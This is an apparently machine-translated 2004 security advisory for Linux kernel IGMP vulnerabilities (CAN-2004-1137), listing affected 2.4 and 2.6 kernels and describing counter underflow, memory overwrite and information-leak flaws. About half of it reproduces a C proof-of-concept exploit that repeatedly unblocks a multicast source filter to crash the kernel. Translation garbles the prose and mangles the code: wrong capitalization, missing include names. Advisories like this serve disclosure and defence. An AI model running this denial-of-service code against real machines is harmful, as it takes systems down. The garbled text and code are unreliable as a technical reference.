Linux kernel IGMP multiple security vulnerabilities

Release Date: 2004-12-14

Update Date: 2004-12-15

Affected system:

Linux kernel 2.6.9

Linux kernel 2.6.8

Linux kernel 2.6.7

Linux kernel 2.6.6

Linux kernel 2.6.5

Linux kernel 2.6.4

Linux kernel 2.6.3

Linux kernel 2.6.2

Linux kernel 2.6.1

Linux kernel 2.6

Linux kernel 2.4.9

Linux kernel 2.4.8

Linux Kernel 2.4.7

Linux kernel 2.4.6

Linux kernel 2.4.5

Linux kernel 2.4.4

Linux kernel 2.4.3

Linux kernel 2.4.28

Linux kernel 2.4.27

Linux kernel 2.4.26

Linux kernel 2.4.25

Linux kernel 2.4.24

Linux kernel 2.4.23

Linux kernel 2.4.22

Linux kernel 2.4.21

Linux Kernel 2.4.20

Linux Kernel 2.4.2

Linux kernel 2.4.19

Linux kernel 2.4.18

Linux kernel 2.4.17

Linux kernel 2.4.16

Linux Kernel 2.4.15

Linux Kernel 2.4.14

Linux Kernel 2.4.13

Linux Kernel 2.4.12

Linux kernel 2.4.11

Linux kernel 2.4.10

Linux Kernel 2.4.1

Linux Kernel 2.4

description:

CVE (CAN) ID:

CAN-2004-1137

Linux kernel is an open source operating system Linux kernel.

Linux IGMP Network Modules and Corresponding User APIs There are multiple security issues, local and remote attackers can use these vulnerabilities to improve privilege or make the kernel crash.

The problem is in the IP_MC_Source () function, which can be called via the user API (IP_ (UN) Block_Source, IP_ADD / DROP_SOURCE_MEMBERSHIP, MCAST_ (UN) Block_Source and MCAST_JOIN / Leave_Source_Group, there is a plurality of kernel crashes and kernel memory overlay issues.

By decreasing the 'sl_count' counter to 0xffffffffff, the above function will enter an infinite loop, which causes the kernel to collapse.

The entire Kmalloc allocated kernel memory will cause sudden machine restart due to 4 bytes, and this vulnerability can be used to privilege.

The problem is that due to the problem, the IP_MC_MSFGET () and the IP_MC_GSFGET () function may be read with a large number of kernel memory information. Crash the system.

The problem is exemplified in the IGMP_Marksources () function in the network module, and is called by the IGMP group. When the query of the external network is received, the full filtering of the received IGMP message parameters can cause a base reading of the core memory. Question, if the Linux machine supports multicast, this vulnerability can be used remotely.

<* Source: Paul Starzetz

Paul@starzetz.de)

link:

http://marc.theaimsgroup.com/?l=bugtraq&m=110304192803108&w=2*>

testing method:

Police Operations (Methods) may have an aggressive, only for safety research and teaching. Users are at your own risk! Paul Starzetz

Paul@starzetz.de) provides the following test methods:

/ *

* Linux IGMP.C Local DOS

* Warning: this code will crash your machine!

*

* GCC -O2 MREQFCK.C -O MREQFCK

*

* CopyRight (C) 2004 ISEC Security Research. All Rights Reserved.

*

* This Program Is for Educational Purposes * ONLY * IT IS Provided "As IS"

* And with welyi, printing, distribution, modification

* WITHOUT Permission of The Author is strictly prohibited.

*

* /

#include

#include

#include

#include

#include

#include

#define mcast_include 1

#define ip_msfilter 41

#define ip_unblock_source 37

#define ip_block_source 38

Struct ip_msfilter

{

__U32 IMSF_MULTIADDR;

__U32 IMSF_INTERFACE;

__U32 IMSF_FMODE;

__U32 IMSF_NUMSRC;

__U32 IMSF_SLIST [1];

}

Struct ip_mreq_source

{

__U32 IMR_MULTIADDR;

__U32 IMR_INTERFACE;

__U32 IMR_SourceAddr;

}

Void

Fatal (const char * message)

{

Printf ("/ n");

IF (! errno)

{

FPRINTF (stdout, "fatal:% s / n", message);

}

Else

{

FPRINTF (stdout, "Fatal:% s (% s)", Message,

(CHAR *) (STRERROR (Errno));

}

Printf ("/ n");

Fflush (stdout);

Exit (1);

}

int

Main ()

{

INT S, R, L;

Struct ip_mreqn mr;

Struct IP_MSFILTER MSF;

Struct ip_mreq_source ms;

IN_ADDR_T A1, A2;

s = Socket (AF_INET, SOCK_DGRAM, 0);

IF (s <0)

Fatal ("Socket");

// first join mcast group

MEMSET (& MR, 0, SIZEOF (MR)); Mr.IMR_Multiaddr.s_addr = inet_addr ("224.0.0.199");

L = SizeOf (MR);

R = setsockopt (S, SOL_IP, IP_ADD_MEMBERSHIP, & MR, L);

IF (r <0)

Fatal ("setsockopt");

// Add source filter count = 1

MEMSET (& MS, 0, SIZEOF (MS));

ms.imr_multiaddr = inet_addr ("224.0.0.199");

Ms.imr_sourceaddr = inet_addr ("4.5.6.7");

L = SizeOf (MS);

R = setsockopt (S, SOL_IP, IP_BLOCK_SOURCE, & MS, L);

IF (r <0)

Fatal ("Setsockopt2");

// del Source Filter Count = 0

// IMR_MULTIADDR & IMR_INTERFACE MUST CORRESPOND To Add

MEMSET (& MS, 0, SIZEOF (MS));

ms.imr_multiaddr = inet_addr ("224.0.0.199");

Ms.imr_sourceaddr = inet_addr ("4.5.6.7");

L = SizeOf (MS);

R = setsockopt (S, SOL_IP, IP_UNBLOCK_SOURCE, & MS, L);

IF (r <0)

Fatal ("Setsockopt2");

// del Again, count = -1

MEMSET (& MS, 0, SIZEOF (MS));

ms.imr_multiaddr = inet_addr ("224.0.0.199");

Ms.imr_sourceaddr = inet_addr ("4.5.6.7");

L = SizeOf (MS);

R = setsockopt (S, SOL_IP, IP_UNBLOCK_SOURCE, & MS, L);

IF (r <0)

Fatal ("setsockopt3");

// Crash

MEMSET (& MS, 0, SIZEOF (MS));

ms.imr_multiaddr = inet_addr ("224.0.0.199");

Ms.imr_sourceaddr = inet_addr ("4.5.6.7");

L = SizeOf (MS);

R = setsockopt (S, SOL_IP, IP_UNBLOCK_SOURCE, & MS, L);

IF (r <0)

Fatal ("Setsockopt4");

GetChar ();

Return 0;

}

Suggest:

Vendor patch:

Linux

-----

At present, manufacturers have not provided patch or upgrade procedures. We recommend users who use this software to pay attention to the manufacturer's homepage to get the latest version:

http://www.kernel.org/